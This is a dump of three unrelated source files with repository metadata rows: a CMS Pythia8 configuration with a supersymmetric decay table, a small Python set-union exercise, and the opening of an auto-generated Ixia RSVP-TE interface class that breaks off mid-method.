2.90894156E-07 2 1000004 -3 # BR(~chi_1+ -> ~c_L sb)
2.56597205E-07 2 -1000003 4 # BR(~chi_1+ -> ~s_L* c )
1.08970890E-07 2 -1000005 6 # BR(~chi_1+ -> ~b_1* t )
2.66850233E-09 2 -2000005 6 # BR(~chi_1+ -> ~b_2* t )
2.21204331E-09 2 -1000015 16 # BR(~chi_1+ -> ~tau_1+ nu_tau)
7.01106740E-03 2 1000022 24 # BR(~chi_1+ -> ~chi_10 W+)
9.34913437E-01 2 1000023 24 # BR(~chi_1+ -> ~chi_20 W+)
3.08104751E-02 2 1000025 24 # BR(~chi_1+ -> ~chi_30 W+)
2.72637115E-02 2 1000035 24 # BR(~chi_1+ -> ~chi_40 W+)
8.35493242E-09 2 1000022 37 # BR(~chi_1+ -> ~chi_10 H+)
1.26441931E-10 2 1000023 37 # BR(~chi_1+ -> ~chi_20 H+)
4.50124336E-08 2 1000025 37 # BR(~chi_1+ -> ~chi_30 H+)
4.67335464E-08 2 1000035 37 # BR(~chi_1+ -> ~chi_40 H+)
#
# PDG Width
DECAY 1000037 3.93890988E+10 # chargino2+ decays
# BR NDA ID1 ID2
6.74883626E-09 2 1000002 -1 # BR(~chi_2+ -> ~u_L db)
1.96057175E-08 2 -1000001 2 # BR(~chi_2+ -> ~d_L* u )
6.74883626E-09 2 1000004 -3 # BR(~chi_2+ -> ~c_L sb)
1.96057175E-08 2 -1000003 4 # BR(~chi_2+ -> ~s_L* c )
1.15937825E-07 2 1000006 -5 # BR(~chi_2+ -> ~t_1 bb)
1.19037282E-07 2 2000006 -5 # BR(~chi_2+ -> ~t_2 bb)
1.11588460E-07 2 -1000005 6 # BR(~chi_2+ -> ~b_1* t )
1.44625833E-08 2 -2000005 6 # BR(~chi_2+ -> ~b_2* t )
1.34536540E-09 2 1000012 -11 # BR(~chi_2+ -> ~nu_eL e+ )
1.34536540E-09 2 1000014 -13 # BR(~chi_2+ -> ~nu_muL mu+ )
1.82588282E-09 2 1000016 -15 # BR(~chi_2+ -> ~nu_tau1 tau+)
3.47934204E-09 2 -1000011 12 # BR(~chi_2+ -> ~e_L+ nu_e)
3.47934204E-09 2 -1000013 14 # BR(~chi_2+ -> ~mu_L+ nu_mu)
1.18484354E-11 2 -1000015 16 # BR(~chi_2+ -> ~tau_1+ nu_tau)
3.76671403E-09 2 -2000015 16 # BR(~chi_2+ -> ~tau_2+ nu_tau)
2.03789007E-02 2 1000024 23 # BR(~chi_2+ -> ~chi_1+ Z )
5.36373400E-03 2 1000022 24 # BR(~chi_2+ -> ~chi_10 W+)
4.86793289E-02 2 1000023 24 # BR(~chi_2+ -> ~chi_20 W+)
3.97860738E-01 2 1000025 24 # BR(~chi_2+ -> ~chi_30 W+)
5.27716802E-01 2 1000035 24 # BR(~chi_2+ -> ~chi_40 W+)
1.42885308E-08 2 1000024 25 # BR(~chi_2+ -> ~chi_1+ h )
1.05312175E-08 2 1000024 35 # BR(~chi_2+ -> ~chi_1+ H )
1.45322715E-08 2 1000024 36 # BR(~chi_2+ -> ~chi_1+ A )
2.63246430E-09 2 1000022 37 # BR(~chi_2+ -> ~chi_10 H+)
2.29697208E-08 2 1000023 37 # BR(~chi_2+ -> ~chi_20 H+)
2.47791857E-09 2 1000025 37 # BR(~chi_2+ -> ~chi_30 H+)
3.81515982E-10 2 1000035 37 # BR(~chi_2+ -> ~chi_40 H+)
#
# These are edited by hand, allowing for R parity violating decays.
# With lambda_122 and lambda_121 equal and non-zero, all the decay modes below would be allowed.
# Each leptonic decay would be have a 12.5% BR, but we choose to have equal BR to 2*mu, 2*e and e+mu
# final states. In addition, we then halve the total leptonic decay branching ratio, and force
# the remaining neutralinos to decay to q qbar nu
#
# PDG Width
DECAY 1000022 1.97812500e-13 # neutralino1 decays
4.15000000E-02 3 -12 -13 11 # BR(~chi_10 --> nu_ebar mu+ e-)
4.15000000E-02 3 12 13 -11 # BR(~chi_10 --> nu_e mu- e+)
8.35000000E-02 3 -12 -13 13 # BR(~chi_10 --> nu_ebar mu+ mu-)
8.35000000E-02 3 12 13 -13 # BR(~chi_10 --> nu_e mu- mu+)
8.35000000E-02 3 -14 -11 11 # BR(~chi_10 --> nu_mubar e+ e-)
8.35000000E-02 3 14 11 -11 # BR(~chi_10 --> nu_mu e- e+)
4.15000000E-02 3 -14 -11 13 # BR(~chi_10 --> nu_mubar e+ mu-)
4.15000000E-02 3 14 11 -13 # BR(~chi_10 --> nu_mu e- mu+)
2.50000000E-01 3 2 1 1 # BR(~chi_10 --> u d d)
2.50000000E-01 3 -2 -1 -1 # BR(~chi_10 --> ubar dbar dbar)
#
# PDG Width
DECAY 1000023 1.97812500e-14 # neutralino2 decays
# BR NDA ID1 ID2
4.15000000E-02 3 -12 -13 11 # BR(~chi_20 --> nu_ebar mu+ e-)
4.15000000E-02 3 12 13 -11 # BR(~chi_20 --> nu_e mu- e+)
8.35000000E-02 3 -12 -13 13 # BR(~chi_20 --> nu_ebar mu+ mu-)
8.35000000E-02 3 12 13 -13 # BR(~chi_20 --> nu_e mu- mu+)
8.35000000E-02 3 -14 -11 11 # BR(~chi_20 --> nu_mubar e+ e-)
8.35000000E-02 3 14 11 -11 # BR(~chi_20 --> nu_mu e- e+)
4.15000000E-02 3 -14 -11 13 # BR(~chi_20 --> nu_mubar e+ mu-)
4.15000000E-02 3 14 11 -13 # BR(~chi_20 --> nu_mu e- mu+)
2.50000000E-01 3 2 1 1 # BR(~chi_20 --> u d d)
2.50000000E-01 3 -2 -1 -1 # BR(~chi_20 --> ubar dbar dbar)
#
# PDG Width
DECAY 1000025 1.97812500e-15 # neutralino3 decays
# BR NDA ID1 ID2
4.15000000E-02 3 -12 -13 11 # BR(~chi_30 --> nu_ebar mu+ e-)
4.15000000E-02 3 12 13 -11 # BR(~chi_30 --> nu_e mu- e+)
8.35000000E-02 3 -12 -13 13 # BR(~chi_30 --> nu_ebar mu+ mu-)
8.35000000E-02 3 12 13 -13 # BR(~chi_30 --> nu_e mu- mu+)
8.35000000E-02 3 -14 -11 11 # BR(~chi_30 --> nu_mubar e+ e-)
8.35000000E-02 3 14 11 -11 # BR(~chi_30 --> nu_mu e- e+)
4.15000000E-02 3 -14 -11 13 # BR(~chi_30 --> nu_mubar e+ mu-)
4.15000000E-02 3 14 11 -13 # BR(~chi_30 --> nu_mu e- mu+)
2.50000000E-01 3 2 1 1 # BR(~chi_30 --> u d d)
2.50000000E-01 3 -2 -1 -1 # BR(~chi_30 --> ubar dbar dbar)
#
# PDG Width
DECAY 1000035 1.97812500e-16 # neutralino4 decays
# BR NDA ID1 ID2
4.15000000E-02 3 -12 -13 11 # BR(~chi_40 --> nu_ebar mu+ e-)
4.15000000E-02 3 12 13 -11 # BR(~chi_40 --> nu_e mu- e+)
8.35000000E-02 3 -12 -13 13 # BR(~chi_40 --> nu_ebar mu+ mu-)
8.35000000E-02 3 12 13 -13 # BR(~chi_40 --> nu_e mu- mu+)
8.35000000E-02 3 -14 -11 11 # BR(~chi_40 --> nu_mubar e+ e-)
8.35000000E-02 3 14 11 -11 # BR(~chi_40 --> nu_mu e- e+)
4.15000000E-02 3 -14 -11 13 # BR(~chi_40 --> nu_mubar e+ mu-)
4.15000000E-02 3 14 11 -13 # BR(~chi_40 --> nu_mu e- mu+)
2.50000000E-01 3 2 1 1 # BR(~chi_40 --> u d d)
2.50000000E-01 3 -2 -1 -1 # BR(~chi_40 --> ubar dbar dbar)
#
# PDG Width
DECAY 25 4.37072897E-02 # h decays
# BR NDA ID1 ID2
-8.48956100E-04 2 5 -5 # BR(h -> b bb )
6.49196146E-03 2 -15 15 # BR(h -> tau+ tau- )
2.29847114E-05 2 -13 13 # BR(h -> mu+ mu- )
4.98236650E-05 2 3 -3 # BR(h -> s sb )
1.74013922E-03 2 4 -4 # BR(h -> c cb )
4.24426486E-03 2 21 21 # BR(h -> g g )
1.30150434E-04 2 22 22 # BR(h -> gam gam )
2.51876211E-05 2 22 23 # BR(h -> Z gam )
2.91783758E-03 2 24 -24 # BR(h -> W+ W- )
2.72932971E-04 2 23 23 # BR(h -> Z Z )
1.09439297E-01 2 1000023 1000023 # BR(h -> ~chi_20 ~chi_20)
1.09439297E-01 2 1000025 1000025 # BR(h -> ~chi_30 ~chi_30)
1.09439297E-01 2 1000035 1000035 # BR(h -> ~chi_40 ~chi_40)
2.18878594E-01 2 1000023 1000025 # BR(h -> ~chi_20 ~chi_30)
2.18878594E-01 2 1000023 1000035 # BR(h -> ~chi_20 ~chi_40)
2.18878594E-01 2 1000025 1000035 # BR(h -> ~chi_30 ~chi_40)
#
# PDG Width
DECAY 35 2.84187547E-01 # H decays
# BR NDA ID1 ID2
-2.33594670E-03 2 5 -5 # BR(H -> b bb )
2.73102816E-01 2 -15 15 # BR(H -> tau+ tau- )
9.65523813E-04 2 -13 13 # BR(H -> mu+ mu- )
1.60807869E-03 2 3 -3 # BR(H -> s sb )
9.94771297E-06 2 4 -4 # BR(H -> c cb )
1.77882571E-01 2 6 -6 # BR(H -> t tb )
2.68203727E-03 2 21 21 # BR(H -> g g )
3.98544353E-06 2 22 22 # BR(H -> gam gam )
1.37343122E-06 2 23 22 # BR(H -> Z gam )
7.97367629E-03 2 24 -24 # BR(H -> W+ W- )
3.71979823E-03 2 23 23 # BR(H -> Z Z )
3.65976272E-02 2 25 25 # BR(H -> h h )
2.38721161E-20 2 36 36 # BR(H -> A A )
4.40168535E-14 2 23 36 # BR(H -> Z A )
1.63370566E-01 2 1000022 1000022 # BR(H -> ~chi_10 ~chi_10)
2.61257666E-02 2 1000023 1000023 # BR(H -> ~chi_20 ~chi_20)
2.61257666E-02 2 1000025 1000025 # BR(H -> ~chi_30 ~chi_30)
2.61257666E-02 2 1000035 1000035 # BR(H -> ~chi_40 ~chi_40)
3.30953487E-02 2 1000022 1000023 # BR(H -> ~chi_10 ~chi_20)
3.30953487E-02 2 1000022 1000025 # BR(H -> ~chi_10 ~chi_30)
3.30953487E-02 2 1000022 1000035 # BR(H -> ~chi_10 ~chi_40)
5.22515333E-02 2 1000023 1000025 # BR(H -> ~chi_20 ~chi_30)
5.22515333E-02 2 1000023 1000035 # BR(H -> ~chi_20 ~chi_40)
5.22515333E-02 2 1000025 1000035 # BR(H -> ~chi_30 ~chi_40)
#
# PDG Width
DECAY 36 4.28802674E-01 # A decays
# BR NDA ID1 ID2
-1.55405765E-03 2 5 -5 # BR(A -> b bb )
1.81296101E-01 2 -15 15 # BR(A -> tau+ tau- )
6.40899983E-04 2 -13 13 # BR(A -> mu+ mu- )
1.06839001E-03 2 3 -3 # BR(A -> s sb )
5.32911397E-06 2 4 -4 # BR(A -> c cb )
3.51193321E-01 2 6 -6 # BR(A -> t tb )
1.70530600E-03 2 21 21 # BR(A -> g g )
5.57854613E-06 2 22 22 # BR(A -> gam gam )
1.09623588E-06 2 23 22 # BR(A -> Z gam )
4.28392098E-03 2 23 25 # BR(A -> Z h )
3.93439429E-01 2 1000022 1000022 # BR(A -> ~chi_10 ~chi_10)
7.30805342E-03 2 1000023 1000023 # BR(A -> ~chi_20 ~chi_20)
7.30805342E-03 2 1000025 1000025 # BR(A -> ~chi_30 ~chi_30)
7.30805342E-03 2 1000035 1000035 # BR(A -> ~chi_40 ~chi_40)
7.14068293E-04 2 1000022 1000023 # BR(A -> ~chi_10 ~chi_20)
7.14068293E-04 2 1000022 1000025 # BR(A -> ~chi_10 ~chi_30)
7.14068293E-04 2 1000022 1000035 # BR(A -> ~chi_10 ~chi_40)
1.46161068E-02 2 1000023 1000025 # BR(A -> ~chi_20 ~chi_30)
1.46161068E-02 2 1000023 1000035 # BR(A -> ~chi_20 ~chi_40)
1.46161068E-02 2 1000025 1000035 # BR(A -> ~chi_30 ~chi_40)
#
# PDG Width
DECAY 37 7.39768709E-01 # H+ decays
# BR NDA ID1 ID2
1.29309542E-03 2 4 -5 # BR(H+ -> c bb )
1.07332262E-01 2 -15 16 # BR(H+ -> tau+ nu_tau )
3.79429727E-04 2 -13 14 # BR(H+ -> mu+ nu_mu )
8.27534994E-06 2 2 -5 # BR(H+ -> u bb )
2.99043681E-05 2 2 -3 # BR(H+ -> u sb )
6.18051235E-04 2 4 -3 # BR(H+ -> c sb )
8.87507918E-01 2 6 -5 # BR(H+ -> t bb )
2.83098990E-03 2 24 25 # BR(H+ -> W+ h )
7.37617799E-08 2 24 36 # BR(H+ -> W+ A )
"""
import FWCore.ParameterSet.Config as cms
from Configuration.Generator.Pythia8CommonSettings_cfi import *
from Configuration.Generator.Pythia8CUEP8M1Settings_cfi import *
generator = cms.EDFilter("Pythia8GeneratorFilter",
pythiaPylistVerbosity = cms.untracked.int32(0),
filterEfficiency = cms.untracked.double(0.1875),
pythiaHepMCVerbosity = cms.untracked.bool(False),
comEnergy = cms.double(COM_ENERGY),
crossSection = cms.untracked.double(CROSS_SECTION),
maxEventsToPrint = cms.untracked.int32(1000),
SLHATableForPythia8 = cms.string('%s' % SLHA_TABLE),
PythiaParameters = cms.PSet(
pythia8CommonSettingsBlock,
pythia8CUEP8M1SettingsBlock,
processParameters = cms.vstring(
'SUSY:all = off',
# Indirect neutralino production from squark decay.
'SUSY:gg2squarkantisquark = on',
'SUSY:qqbar2squarkantisquark= on',
'SUSY:qq2squarksquark = on',
# Direct neutralino pair production via weak process.
# 'SUSY:qqbar2chi0chi0 = on',
# 'RHadrons:allow = on',
# 'RHadrons:allowDecay = on',
# 'RHadrons:setMasses = on',
# Pythia calculates the lifetime from the width in the SLHA file, so this shouldn't matter.
'1000022:tau0 = %.1f' % CHIZERO1_CTAU,
'1000023:tau0 = %.1f' % CHIZERO2_CTAU,
'1000025:tau0 = %.1f' % CHIZERO3_CTAU,
'1000035:tau0 = %.1f' % CHIZERO4_CTAU,
# Allow particles of any lifetime to decay in Pythia. (Unnecessary in Pythia8)
# 'ParticleDecays:limitTau0 = off'
),
parameterSets = cms.vstring(
'pythia8CommonSettings',
'pythia8CUEP8M1Settings',
'processParameters'
)
)
)
#== Veto events containing two neutralinos of different species.
pairFilterChi1 = cms.EDFilter("MCParticlePairFilter",
ParticleID1 = cms.untracked.vint32(1000022),
ParticleID2 = cms.untracked.vint32(1000023,1000025,1000035)
)
pairFilterChi2 = cms.EDFilter("MCParticlePairFilter",
ParticleID1 = cms.untracked.vint32(1000023),
ParticleID2 = cms.untracked.vint32(1000022,1000025,1000035)
)
pairFilterChi3 = cms.EDFilter("MCParticlePairFilter",
ParticleID1 = cms.untracked.vint32(1000025),
ParticleID2 = cms.untracked.vint32(1000022,1000023,1000035)
)
pairFilterChi4 = cms.EDFilter("MCParticlePairFilter",
ParticleID1 = cms.untracked.vint32(1000035),
ParticleID2 = cms.untracked.vint32(1000022,1000023,1000025)
)
# Take logical AND of the NOT of each of the above filters, so selecting events with a pair of identical
# neutralinos.
pairFilterSequence = cms.Sequence(~pairFilterChi1 * ~pairFilterChi2 * ~pairFilterChi3 * ~pairFilterChi4)
# N.B. If your PYUPDA tables introduces new exotic particles, you will need
# to include:
#
from PhysicsTools.HepMCCandAlgos.genParticles_cfi import *
genParticlesForFilter = genParticles.clone()
genParticlesForFilter.abortOnUnknownPDGCode = cms.untracked.bool(False)
#== Require event to contain at least one neutralino that decays leptonically.
from GeneratorInterface.GenFilters.XtoFFbarFilter_cfi import *
chiZeroToLLbarFilter = XtoFFbarFilter.clone(
src = cms.InputTag("genParticlesForFilter"),
# Specify PDG codes of exotics to be accepted by filter.
idMotherX = cms.vint32(1000022,1000023,1000025,1000035),
idMotherY = cms.vint32(),
# Allowed PDG ID of daughter of X (don't specify anti-particle code)
idDaughterF = cms.vint32(11,13),
# Allowed PDG ID of daughter of Y (don't specify anti-particle code)
idDaughterG = cms.vint32()
# If this is set true, then parameter idMotherY is ignored, and instead set equal to idMotherX.
# Furthermore, events are vetoed if they contain more than one species from the list idMotherX.
# idYequalsX = cms.bool(False)
)
ProductionFilterSequence = cms.Sequence(generator*pairFilterSequence*genParticlesForFilter*chiZeroToLLbarFilter)
| [
"[email protected]"
] | |
d387d6b7108eb53681abf09eee7e082564d3f4cd | 90a3c3ecfab0425f520115e049dc6e8476b72b7c | /toph/Set Union.py | 6fdfa05cf4cd80906d7f77ed398ea2bb349d9a95 | [] | no_license | Manash-git/Competitive-Programming | f3e5f7a9bc202ec0a4667fe7f033f0013c8dfd83 | bf79517699285c135bc126c5fabfd724e586460f | refs/heads/master | 2022-12-05T19:37:11.814718 | 2020-08-24T19:16:30 | 2020-08-24T19:16:30 | 108,683,246 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 542 | py | # n = {1,2,5}
# print(type(n))
# l= [1,5,6]
# print(type(set(l)))
# print(n | set(l))
# res = n | set(l)
# for i in res:
# print(i,end=" ")
n,m = input().split()
x = [int(i) for i in str(input()).split()]
y = [int(i) for i in str(input()).split()]
x= set(x)
y= set(y)
# print( set(x)| set(y))
res = sorted(list(x.union(y)))
print(res)
for i in res:
print(i,end=" ")
# for i in range(len(res)-1):
# print(res[i], end=" ")
# for i in range(len(res)):
# if i==len(res)-1:
# print(res[i])
# else:
# print(res[i],end=" ") | [
"[email protected]"
] | |
52bfaf495d77c7025a801ef5061d4964459beaf2 | 1c6283303ceb883add8de4ee07c5ffcfc2e93fab | /Jinja2/lib/python3.7/site-packages/uhd_restpy/testplatform/sessions/ixnetwork/topology/rsvpteif_e2b2ecdbf1fa5e15d2f6d87dd1789f1c.py | cff9728ec94869fd282e2d1c193da41ec355c901 | [] | no_license | pdobrinskiy/devcore | 0f5b3dfc2f3bf1e44abd716f008a01c443e14f18 | 580c7df6f5db8c118990cf01bc2b986285b9718b | refs/heads/main | 2023-07-29T20:28:49.035475 | 2021-09-14T10:02:16 | 2021-09-14T10:02:16 | 405,919,390 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 58,370 | py | # MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from uhd_restpy.base import Base
from uhd_restpy.files import Files
from typing import List, Any, Union
class RsvpteIf(Base):
"""Rsvp Neighbor (Device) level Configuration
The RsvpteIf class encapsulates a list of rsvpteIf resources that are managed by the user.
A list of resources can be retrieved from the server using the RsvpteIf.find() method.
The list can be managed by using the RsvpteIf.add() and RsvpteIf.remove() methods.
"""
__slots__ = ()
_SDM_NAME = 'rsvpteIf'
_SDM_ATT_MAP = {
'Active': 'active',
'ActualRestartTime': 'actualRestartTime',
'AdvertisedRestartTime': 'advertisedRestartTime',
'AuthenticationAlgorithm': 'authenticationAlgorithm',
'AuthenticationKeyForReceivedPackets': 'authenticationKeyForReceivedPackets',
'AuthenticationKeyForSentPackets': 'authenticationKeyForSentPackets',
'AuthenticationKeyIdentifier': 'authenticationKeyIdentifier',
'AutoGenerateAuthenticationKeyIdentifier': 'autoGenerateAuthenticationKeyIdentifier',
'BundleMessageThresholdTime': 'bundleMessageThresholdTime',
'CheckIntegrityForReceivedPackets': 'checkIntegrityForReceivedPackets',
'ConnectedVia': 'connectedVia',
'Count': 'count',
'DescriptiveName': 'descriptiveName',
'DutIp': 'dutIp',
'EnableBfdRegistration': 'enableBfdRegistration',
'EnableBundleMessageSending': 'enableBundleMessageSending',
'EnableBundleMessageThresholdTimer': 'enableBundleMessageThresholdTimer',
'EnableGracefulRestartHelperMode': 'enableGracefulRestartHelperMode',
'EnableGracefulRestartRestartingMode': 'enableGracefulRestartRestartingMode',
'EnableHelloExtension': 'enableHelloExtension',
'EnableRefreshReduction': 'enableRefreshReduction',
'Errors': 'errors',
'GenerateSequenceNumberBasedOnRealTime': 'generateSequenceNumberBasedOnRealTime',
'HandshakeRequired': 'handshakeRequired',
'HelloInterval': 'helloInterval',
'HelloTimeoutMultiplier': 'helloTimeoutMultiplier',
'InitialSequenceNumber': 'initialSequenceNumber',
'LabelReqRefCount': 'labelReqRefCount',
'LabelSpaceEnd': 'labelSpaceEnd',
'LabelSpaceStart': 'labelSpaceStart',
'Multiplier': 'multiplier',
'Name': 'name',
'NumberOfRestarts': 'numberOfRestarts',
'OurIp': 'ourIp',
'RecoveryTime': 'recoveryTime',
'RestartStartTime': 'restartStartTime',
'RestartUpTime': 'restartUpTime',
'SessionStatus': 'sessionStatus',
'StackedLayers': 'stackedLayers',
'StateCounts': 'stateCounts',
'Status': 'status',
'SummaryRefreshInterval': 'summaryRefreshInterval',
'UseSameAuthenticationKeyForPeer': 'useSameAuthenticationKeyForPeer',
'UsingGatewayIp': 'usingGatewayIp',
}
_SDM_ENUM_MAP = {
'status': ['configured', 'error', 'mixed', 'notStarted', 'started', 'starting', 'stopping'],
}
def __init__(self, parent, list_op=False):
super(RsvpteIf, self).__init__(parent, list_op)
@property
def LearnedInfo(self):
"""
Returns
-------
- obj(uhd_restpy.testplatform.sessions.ixnetwork.topology.learnedinfo.learnedinfo_ff4d5e5643a63bccb40b6cf64fc58100.LearnedInfo): An instance of the LearnedInfo class
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
from uhd_restpy.testplatform.sessions.ixnetwork.topology.learnedinfo.learnedinfo_ff4d5e5643a63bccb40b6cf64fc58100 import LearnedInfo
if self._properties.get('LearnedInfo', None) is not None:
return self._properties.get('LearnedInfo')
else:
return LearnedInfo(self)
@property
def Active(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Activate/Deactivate Configuration
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Active']))
@property
def ActualRestartTime(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Actual Restart Time (ms)
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ActualRestartTime']))
@property
def AdvertisedRestartTime(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Advertised Restart Time (ms)
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['AdvertisedRestartTime']))
@property
def AuthenticationAlgorithm(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Authentication Algorithm
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['AuthenticationAlgorithm']))
@property
def AuthenticationKeyForReceivedPackets(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Authentication Key for Received Packets
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['AuthenticationKeyForReceivedPackets']))
@property
def AuthenticationKeyForSentPackets(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Authentication Key for Sent Packets
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['AuthenticationKeyForSentPackets']))
@property
def AuthenticationKeyIdentifier(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Authentication Key Identifier
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['AuthenticationKeyIdentifier']))
@property
def AutoGenerateAuthenticationKeyIdentifier(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Auto Generate Authentication Key Identifier
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['AutoGenerateAuthenticationKeyIdentifier']))
@property
def BundleMessageThresholdTime(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Bundle Message Threshold Time (ms)
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['BundleMessageThresholdTime']))
@property
def CheckIntegrityForReceivedPackets(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Check Integrity for Received Packets
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['CheckIntegrityForReceivedPackets']))
@property
def ConnectedVia(self):
# type: () -> List[str]
"""DEPRECATED
Returns
-------
- list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*]): List of layers this layer is used to connect with to the wire.
"""
return self._get_attribute(self._SDM_ATT_MAP['ConnectedVia'])
@ConnectedVia.setter
def ConnectedVia(self, value):
# type: (List[str]) -> None
self._set_attribute(self._SDM_ATT_MAP['ConnectedVia'], value)
@property
def Count(self):
# type: () -> int
"""
Returns
-------
- number: Number of elements inside associated multiplier-scaled container object, e.g. number of devices inside a Device Group.
"""
return self._get_attribute(self._SDM_ATT_MAP['Count'])
@property
def DescriptiveName(self):
# type: () -> str
"""
Returns
-------
- str: Longer, more descriptive name for element. It's not guaranteed to be unique like -name-, but may offer more context.
"""
return self._get_attribute(self._SDM_ATT_MAP['DescriptiveName'])
@property
def DutIp(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): DUT IP
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['DutIp']))
@property
def EnableBfdRegistration(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Enable BFD Registration
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['EnableBfdRegistration']))
@property
def EnableBundleMessageSending(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Enable Bundle Message Sending
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['EnableBundleMessageSending']))
@property
def EnableBundleMessageThresholdTimer(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Enable Bundle Message Threshold Timer
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['EnableBundleMessageThresholdTimer']))
@property
def EnableGracefulRestartHelperMode(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Enable Helper-Mode
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['EnableGracefulRestartHelperMode']))
@property
def EnableGracefulRestartRestartingMode(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Enable Restarting-Mode
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['EnableGracefulRestartRestartingMode']))
@property
def EnableHelloExtension(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Enable Hello Extension
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['EnableHelloExtension']))
@property
def EnableRefreshReduction(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Enable Refresh Reduction
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['EnableRefreshReduction']))
@property
def Errors(self):
"""
Returns
-------
- list(dict(arg1:str[None | /api/v1/sessions/1/ixnetwork//.../*],arg2:list[str])): A list of errors that have occurred
"""
return self._get_attribute(self._SDM_ATT_MAP['Errors'])
@property
def GenerateSequenceNumberBasedOnRealTime(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Generate Sequence Number Based on Real Time
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['GenerateSequenceNumberBasedOnRealTime']))
@property
def HandshakeRequired(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Handshake Required
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HandshakeRequired']))
@property
def HelloInterval(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Hello Interval (ms)
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HelloInterval']))
@property
def HelloTimeoutMultiplier(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Hello Timeout Multiplier
"""
from uhd_restpy.multivalue import Multivalue
